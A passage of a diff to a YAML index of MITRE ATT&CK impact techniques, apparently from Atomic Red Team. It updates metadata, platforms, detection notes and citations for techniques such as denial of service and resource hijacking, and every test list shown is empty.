       description: "Adversaries may exploit software vulnerabilities that can cause
         an application or system to crash and deny availability to users. (Citation:
@@ -57399,13 +58156,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Attacks targeting web applications may generate logs in the
         web server, application server, and/or database server that can be used to
         identify the type of attack. Externally monitor the availability of services
         that may be targeted by an Endpoint DoS.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57413,36 +58177,27 @@ impact:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1565.003:
-    technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
       type: attack-pattern
-      created: '2020-03-02T14:30:05.252Z'
+      id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+      created: '2020-02-20T15:37:27.052Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.003
-        url: https://attack.mitre.org/techniques/T1565/003
-      - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
-          November 6, 2018.'
-        url: https://content.fireeye.com/apt/rpt-apt38
-        source_name: FireEye APT38 Oct 2018
-      - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
-        description: Department of Justice. (2018, September 6). Criminal Complaint
-          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1499/004
+        external_id: T1499.004
+      - source_name: Sucuri BIND9 August 2015
+        description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+          in the Wild. Retrieved April 26, 2019.
+        url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1565.003:
+    technique:
+      modified: '2024-10-15T18:21:43.760Z'
       name: Runtime Data Manipulation
       description: |-
         Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
@@ -57451,11 +58206,17 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: Inspect important application binary file hashes, locations,
         and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'File: File Deletion'
@@ -57464,17 +58225,31 @@ impact:
       - 'File: File Creation'
       x_mitre_impact_type:
       - Integrity
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - root
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+      created: '2020-03-02T14:30:05.252Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1565/003
+        external_id: T1565.003
+      - source_name: DOJ Lazarus Sony 2018
+        description: Department of Justice. (2018, September 6). Criminal Complaint
+          - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
+      - source_name: FireEye APT38 Oct 2018
+        description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+          November 6, 2018.'
+        url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1498.002:
     technique:
-      modified: '2023-03-30T21:01:41.052Z'
+      modified: '2024-10-15T16:04:34.495Z'
       name: Reflection Amplification
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
@@ -57483,6 +58258,7 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
         before the traffic volume is sufficient to cause impact to the availability
         of the service, but such response time typically requires very aggressive
@@ -57498,17 +58274,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Sensor Health: Host Status'
       - 'Network Traffic: Network Traffic Flow'
@@ -57518,14 +58289,15 @@ impact:
       id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
       created: '2020-03-02T20:08:03.691Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1498/002
         external_id: T1498.002
-      - source_name: Cloudflare ReflectionDoS May 2017
-        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
-          (attacks). Retrieved April 23, 2019.
-        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       - source_name: Cloudflare DNSamplficationDoS
         description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
           April 23, 2019.
@@ -57534,28 +58306,28 @@ impact:
         description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
           April 23, 2019.
         url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+      - source_name: Cloudflare ReflectionDoS May 2017
+        description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+          (attacks). Retrieved April 23, 2019.
+        url: https://blog.cloudflare.com/reflections-on-reflections/
+      - source_name: Cloudflare Memcrashed Feb 2018
+        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
       - source_name: Arbor AnnualDoSreport Jan 2018
         description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
           Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
           into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
           Infrastructure Security Report. Retrieved April 22, 2019.
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-      - source_name: Cloudflare Memcrashed Feb 2018
-        description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
-          - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
-        url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
-      - source_name: Cisco DoSdetectNetflow
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1499.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:05:48.014Z'
       name: Service Exhaustion Flood
       description: |-
         Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
@@ -57566,7 +58338,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57577,17 +58348,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Sensor Health: Host Status'
@@ -57624,7 +58390,8 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491:
     technique:
@@ -57645,7 +58412,7 @@ impact:
       - source_name: mitre-attack
         external_id: T1491
         url: https://attack.mitre.org/techniques/T1491
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:42.056Z'
       name: Defacement
       description: "Adversaries may modify visual content available internally or
         externally to an enterprise network, thus affecting the integrity of the original
@@ -57672,12 +58439,78 @@ impact:
       x_mitre_impact_type:
       - Integrity
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+    atomic_tests: []
+  T1496.002:
+    technique:
+      modified: '2024-09-25T14:59:35.287Z'
+      name: Bandwidth Hijacking
+      description: "Adversaries may leverage the network bandwidth resources of co-opted
+        systems to complete resource-intensive tasks, which may impact system and/or
+        hosted service availability. \n\nAdversaries may also use malware that leverages
+        a system's network bandwidth as part of a botnet in order to facilitate [Network
+        Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+        to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+        in proxyjacking by selling use of the victims' network bandwidth and IP address
+        to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+        in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+        Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+        financial costs or availability disruptions, this technique may cause reputational
+        damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+        Proxyjacking)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      - IaaS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'File: File Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Connection Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+      created: '2024-09-25T13:44:35.412Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/002
+        external_id: T1496.002
+      - source_name: Sysdig Proxyjacking
+        description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+          Chat. Retrieved July 6, 2023.
+        url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+      - source_name: Unit 42 Leaked Environment Variables 2024
+        description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+          Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+          Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+        url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+      - source_name: GoBotKR
+        description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+          Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+        url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1657:
     technique:
-      modified: '2024-04-11T20:22:14.359Z'
+      modified: '2024-10-15T15:58:10.254Z'
       name: Financial Theft
       description: "Adversaries may steal monetary resources from targets through
         extortion, social engineering, technical theft, or other methods aimed at
@@ -57710,7 +58543,7 @@ impact:
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
       - Pawel Partyka, Microsoft Threat Intelligence
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -57720,10 +58553,9 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
@@ -57786,7 +58618,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1491.001:
     technique:
@@ -57827,7 +58658,7 @@ impact:
         messages. Since internally defacing systems exposes an adversary''s presence,
         it often takes place after other intrusion goals have been accomplished.(Citation:
         Novetta Blockbuster Destructive Malware)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-28T18:55:35.988Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Defacement: Internal Defacement'
       x_mitre_detection: Monitor internal and websites for unplanned content changes.
@@ -57848,9 +58679,157 @@ impact:
       - Integrity
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1491.001
     atomic_tests: []
+  T1496.004:
+    technique:
+      modified: '2024-10-16T17:59:27.535Z'
+      name: Cloud Service Hijacking
+      description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+        applications to complete resource-intensive tasks, which may impact hosted
+        service availability. \n\nFor example, adversaries may leverage email and
+        messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+        Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+        spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+        messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+        2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+        in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+        AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+        2024)\n\nIn some cases, adversaries may leverage services that the victim
+        is already using. In others, particularly when the service is part of a larger
+        cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+        2024) Leveraging SaaS applications may cause the victim to incur significant
+        financial costs, use up service quotas, and otherwise impact availability. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+      created: '2024-09-25T14:05:59.910Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/004
+        external_id: T1496.004
+      - source_name: SentinelLabs SNS Sender 2024
+        description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+          Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
+        url: https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
+      - source_name: Lacework LLMJacking 2024
+        description: Lacework Labs. (2024, June 6). Detecting AI resource-hijacking
+          with Composite Alerts. Retrieved September 25, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
+      - source_name: Sysdig LLMJacking 2024
+        description: 'LLMjacking: Stolen Cloud Credentials Used in New AI Attack.
+          (2024, May 6). Alessandro Brucato. Retrieved September 25, 2024.'
+        url: https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/
+      - source_name: Permiso SES Abuse 2023
+        description: Nathan Eades. (2023, January 12). SES-pionage. Retrieved September
+          25, 2024.
+        url: https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.001:
+    technique:
+      modified: '2024-10-13T16:58:38.820Z'
+      name: Compute Hijacking
+      description: "Adversaries may leverage the compute resources of co-opted systems
+        to complete resource-intensive tasks, which may impact system and/or hosted
+        service availability. \n\nOne common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        is to validate transactions of cryptocurrency networks and earn virtual currency.
+        Adversaries may consume enough system resources to negatively impact and/or
+        cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus
+        Under The Hood Blog 2017) Servers and cloud-based systems are common targets
+        because of the high potential for available resources, but user endpoint systems
+        may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)
+        and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized
+        environments may also be targeted due to the ease of deployment via exposed
+        APIs and the potential for scaling mining activities by deploying or compromising
+        multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard
+        Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some
+        cryptocurrency mining malware identify then kill off processes for competing
+        malware to ensure it’s not competing for resources.(Citation: Trend Micro
+        War of Crypto Miners)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Network Traffic: Network Connection Creation'
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Sensor Health: Host Status'
+      - 'Process: Process Creation'
+      - 'File: File Creation'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--a718a0c8-5768-41a1-9958-a1cc3f995e99
+      created: '2024-09-25T13:34:30.100Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1496/001
+        external_id: T1496.001
+      - source_name: Unit 42 Hildegard Malware
+        description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
+          Malware Targeting Kubernetes. Retrieved April 5, 2021.'
+        url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
+      - source_name: CloudSploit - Unused AWS Regions
+        description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
+          Retrieved October 8, 2019.
+        url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
+      - source_name: Kaspersky Lazarus Under The Hood Blog 2017
+        description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
+          17, 2019.
+        url: https://securelist.com/lazarus-under-the-hood/77908/
+      - source_name: Trend Micro Exposed Docker APIs
+        description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
+          via Exposed APIs. Retrieved April 6, 2021.
+        url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
+      - source_name: Trend Micro War of Crypto Miners
+        description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
+          Miners: A Battle for Resources. Retrieved April 6, 2021.'
+        url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1565:
     technique:
       modified: '2024-02-02T17:18:39.004Z'
@@ -57903,11 +58882,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1531:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:35:13.577Z'
       name: Account Access Removal
       description: "Adversaries may interrupt availability of system and network resources
         by inhibiting access to accounts utilized by legitimate users. Accounts may
@@ -57930,6 +58908,7 @@ impact:
         phase_name: impact
       x_mitre_contributors:
       - Hubert Mank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -57947,9 +58926,10 @@ impact:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      x_mitre_version: '1.2'
+      - IaaS
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -57975,9 +58955,8 @@ impact:
         url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1531
     atomic_tests: []
   T1486:
@@ -58064,7 +59043,7 @@ impact:
         NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
         compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
         Part 1)"
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T13:07:10.318Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data Encrypted for Impact
       x_mitre_detection: |-
@@ -58088,12 +59067,11 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1486
     atomic_tests: []
   T1499:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:56:47.424Z'
       name: Endpoint Denial of Service
       description: |
         Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58112,7 +59090,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Alfredo Oliveira, Trend Micro
       - David Fiser, @anu4is, Trend Micro
@@ -58129,18 +59106,13 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.1'
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -58164,8 +59136,8 @@ impact:
       - source_name: FSISAC FraudNetDoS September 2012
         description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
           Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
-          Fraud. Retrieved April 18, 2019.
-        url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
       - source_name: ArsTechnica Great Firewall of China
         description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
           on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58185,33 +59157,22 @@ impact:
         url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1496:
     technique:
-      modified: '2024-02-14T21:00:00.467Z'
+      modified: '2024-10-13T17:00:09.759Z'
       name: Resource Hijacking
       description: "Adversaries may leverage the resources of co-opted systems to
         complete resource-intensive tasks, which may impact system and/or hosted service
-        availability. \n\nOne common purpose for Resource Hijacking is to validate
-        transactions of cryptocurrency networks and earn virtual currency. Adversaries
-        may consume enough system resources to negatively impact and/or cause affected
-        machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
-        Blog 2017) Servers and cloud-based systems are common targets because of the
-        high potential for available resources, but user endpoint systems may also
-        be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
